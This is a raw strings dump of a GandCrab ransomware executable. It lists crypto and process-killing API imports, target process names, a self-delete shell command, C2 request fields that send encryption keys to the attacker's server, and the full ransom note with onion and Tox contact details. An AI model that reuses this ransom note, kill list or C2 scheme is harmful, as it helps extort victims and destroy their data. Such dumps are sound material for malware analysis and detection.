!This D{b
%m cannot be run in DOS mode.
:4Rich
`.rdata
@.data
@.rsrc
@.reloc
SVWj@h
<}tK<=tBF
<}t)F<=t
HthHuo
<}tcG<=t
SVWj@h
SVWj@h
D$$PQh
D$$PWh
D$$PWh
SVWj@h
SVWj@h
QSVWj@h
0SWj@h
L&&jl66Z~??A
Oh44\Q
sb11S*
uB!!c 
D""fT**~;
;d22Vt::N
J%%o\..r8
gg}V++
jL&&Zl66A~??
Sb11?*
tX,,.4
RRMv;;a
MMUf33
PPDx<<
cB!!0 
~~Gz==
fD""~T**
Vd22Nt::
xxoJ%%r\..$8
tt!>
ppB|>>
aa_j55
UUxP((z
&jL&6Zl6?A~?
~=Gz=d
"fD"*~T*
2Vd2:Nt:
x%oJ%.r\.
t!>K
a5_j5W
=&&jL66Zl??A~
g99KrJJ
==Gzdd
""fD**~T
22Vd::Nt
$$lH\\
77Ynmm
%%oJ..r\
!>KK
55_jWW
[T:$6.
[.:$6g
j_FbT~
h4,8$@_
2\tHlWB
PQAeS~
~4[C)v
8$4,6-9'$6.:*?#1pHhX~AeSlZrNbS
EHl\tFeQ
T~FbZwKi
,8$4'6-9:$6.1*?#XpHhS~AeNlZrEbS
FeQbT~FiZwK
4,8$9'6-.:$6#1*?hXpHeS~ArNlZ
EbS\tHlQ
FeFbT~KiZw
$4,8-9'66.:$?#1*HhXpAeS~ZrNlS
Ebl\tHeQ
F~FbTwKiZ
pub_key
DELETE}
{DELETE}
Fatal error
Fatal error: rsaenh.dll is not initialized as well
advapi32.dll
CheckTokenMembership
Address:
fabian wosar <3
Can't find server
aeriedjD#shasj
*******************
RtlComputeCrc32
GandCrabGandCrabnomoreransom.coinomoreransom.bit
encryption.dll
_ReflectiveLoader@0
ExitProcess
lstrlenA
HeapAlloc
HeapFree
GetProcessHeap
GetProcAddress
VirtualAlloc
GetModuleHandleA
lstrcpyA
GetEnvironmentVariableW
GetFileSize
MapViewOfFile
UnmapViewOfFile
GetModuleHandleW
WriteFile
GetModuleFileNameW
CreateFileW
ExitThread
lstrlenW
GetTempPathW
CreateFileMappingW
lstrcatW
CloseHandle
CreateThread
VirtualFree
lstrcmpiW
lstrcmpiA
SetFilePointer
GetFileAttributesW
ReadFile
GetLastError
MoveFileW
lstrcpyW
SetFileAttributesW
CreateMutexW
GetDriveTypeW
VerSetConditionMask
WaitForSingleObject
GetTickCount
InitializeCriticalSection
OpenProcess
GetSystemDirectoryW
TerminateThread
TerminateProcess
VerifyVersionInfoW
WaitForMultipleObjects
DeleteCriticalSection
ExpandEnvironmentStringsW
CreateProcessW
SetHandleInformation
lstrcatA
MultiByteToWideChar
CreatePipe
Process32FirstW
Process32NextW
CreateToolhelp32Snapshot
LeaveCriticalSection
EnterCriticalSection
FindFirstFileW
lstrcmpW
FindClose
FindNextFileW
GetNativeSystemInfo
GetComputerNameW
GetDiskFreeSpaceW
GetWindowsDirectoryW
GetVolumeInformationW
LoadLibraryA
KERNEL32.dll
DispatchMessageW
DefWindowProcW
UpdateWindow
SendMessageW
CreateWindowExW
ShowWindow
SetWindowLongW
LoadIconW
RegisterClassExW
TranslateMessage
wsprintfW
BeginPaint
LoadCursorW
GetMessageW
DestroyWindow
EndPaint
MessageBoxA
GetForegroundWindow
USER32.dll
TextOutW
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegSetValueExW
AllocateAndInitializeSid
FreeSid
CryptExportKey
CryptAcquireContextW
CryptGetKeyParam
CryptReleaseContext
CryptImportKey
CryptEncrypt
CryptGenKey
CryptDestroyKey
GetUserNameW
RegQueryValueExW
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
CryptStringToBinaryA
CryptBinaryToStringA
CRYPT32.dll
InternetOpenW
InternetReadFile
InternetConnectW
HttpSendRequestW
HttpAddRequestHeadersW
HttpOpenRequestW
InternetCloseHandle
WININET.dll
GetDeviceDriverBaseNameW
EnumDeviceDrivers
PSAPI.DLL
IsProcessorFeaturePresent
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
1#1-171A1i1s1}1
2:2D2N2X2b2l2v2
33)333=3G3^3h3r3|3
4/494C4M4W4g4q4{4
5(585B5L5V5~5
6'6O6Y6c6m6w6
6 7*747>7H7R7\7s7}7
8#8-8D8N8X8b8l8|8
99)939=9M9W9a9k9
:(:2:<:d:n:x:
;5;?;I;S;];g;q;
='=1=;=E=m=w=
>?>I>S>]>g>q>{>
?%?/?9?C?M?e?o?y?
0070A0K0U0_0o0y0
1'111A1K1U1_1
2'212Y2c2m2w2
3+353?3I3S3]3g3
4%4/494Q4[4e4o4y4
5#5-575A5K5[5e5o5y5
6-676A6K6s6}6
7E7O7Y7c7m7w7
7N8k8{8
<0<7<I<Z<b<
>0>U>[>j>w>
1S2]2d2u2
6(6Z6e6m6
6.737:7@7u7{7
919B9i9~9
9+:2:@:G:N:U:\:c:q:x:
>B>T>]>g>
20N0b0i0s0z0
2)2/2?2D2
77'7/777?7G7O7W7_7g7o7w7
8'828=8H8S8^8d8~8
9]9n9y9
9,:F:_:g:
;%;+;K;Q;s;
<1<_<m<
0>0L0S0j0
1#181?1P1a1h1y1
1$2;2`2m2u2
3,3=3C3H3Y3x3
404<4[4m4|4
5$555B5O5\5i5t5
7"7,7<7K7o7
;#;(;5;O;
;(<2<H<
3=3U3_3k3t3
575=5T5`5j5z5
6*6/656U6Z6p6
8%818V8m8
899m9u9|9
9T:Y:f:t:z:
;<;Q;Z;j;p;
<!<.<?<P<Y<`<g<z<
=+=8=T=
?)?T?d?u?
020@0T0b0v0
1!1A1[1e1|1
2#292D2c2n2
3"444O4X4k4t4
5#565?5J5S5w5
6'6.636C6H6O6V6]6d6
727G7L7a7l7
8$8*8N8V8q8
9%9.9D9P9X9d9o9
:B:I:P:W:^:e:l:s:z:
;<;A;I;Q;X;f;
?$?Q?[?e?x?
0&0R0^0d0|0o1
2W2e2y2
2?3M3\3
4#424<4B4
4G5N5^5k5
6(6S6Z6i6s6y6
6(7/7>7H7N7
8#8w8~8
=!>(>,>0>4>8><>@>D>
1i1r1z1
jjjjjj
AppData
\Microsoft\
GandCrab!
win32app
firefox
ransom_id
os_bit
os_major
pc_keyb
pc_lang
pc_group
pc_name
pc_user
ransom_id=
{USERID}
Global\
msftesql.exe
sqlagent.exe
sqlbrowser.exe
sqlservr.exe
sqlwriter.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe
mydesktopqos.exe
agntsvc.exeisqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
agntsvc.exeagntsvc.exe
agntsvc.exeencsvc.exe
firefoxconfig.exe
tbirdconfig.exe
ocomm.exe
mysqld.exe
mysqld-nt.exe
mysqld-opt.exe
dbeng50.exe
sqbcoreservice.exe
excel.exe
infopath.exe
msaccess.exe
mspub.exe
onenote.exe
outlook.exe
powerpnt.exe
steam.exe
thebat.exe
thebat64.exe
thunderbird.exe
visio.exe
winword.exe
wordpad.exe
/c timeout -c 5 & del "%s" /f /q
cmd.exe
Content-Type: application/x-www-form-urlencoded
curl.php?token=
action=result&e_files=%d&e_size=%I64u&e_time=%d&
action=call&
&pub_key=
&priv_key=
&version=2.3r
Microsoft Enhanced Cryptographic Provider v1.0
\ProgramData\
\Program Files\
\Tor Browser\
Ransomware
\All Users\
\Local Settings\
:\Windows\
desktop.ini
autorun.inf
ntuser.dat
iconcache.db
bootsect.bak
boot.ini
ntuser.dat.log
thumbs.db
GDCB-DECRYPT.txt
%s\GDCB-DECRYPT.txt
ipv4bot.whatismyipaddress.com
undefined
Domain
SYSTEM\CurrentControlSet\services\Tcpip\Parameters
WORKGROUP
LocaleName
Control Panel\International
Keyboard Layout\Preload
00000419
productName
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion
Itanium
Unknown
ProcessorNameString
HARDWARE\DESCRIPTION\System\CentralProcessor\0
Identifier
2ntdll.dll
UNKNOWN
NO_ROOT_DIR
REMOVABLE
REMOTE
RAMDISK
%I64u/
AVP.EXE
ekrn.exe
avgnt.exe
ashDisp.exe
NortonAntiBot.exe
Mcshield.exe
avengine.exe
cmdagent.exe
smc.exe
persfw.exe
pccpfw.exe
fsguiexe.exe
cfp.exe
msmpeng.exe
HTTP/1.1
---= GANDCRAB =--- 
Attention! 
All your files documents, photos, databases and other important files are encrypted and have the extension: .GDCB 
The only method of recovering files is to purchase a private key. It is on our server and only we can recover your files. 
The server with your key is in a closed network TOR. You can get there by the following ways: 
1. Download Tor browser - https://www.torproject.org/ 
2. Install Tor browser 
3. Open Tor Browser 
4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b                         
5. Follow the instructions on this page 
                         
On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. 
If you can't download TOR and use it, or in your country TOR blocked, read it:
1. Visit https://tox.chat/download.html
2. Download and install qTOX on your PC.
3. Open it, click "New Profile" and create profile.
4. Search our contact - 6C5AD4057E594E090E0C987B3089F74335DA75F04B7403E0575663C261349569F64D28CDCF45
5. In message please write your ID and wait our answer: 3a23db8448d3b2b                            
DANGEROUS! 
Do not try to modify files or use your own private key - this will result in the loss of your data forever! 
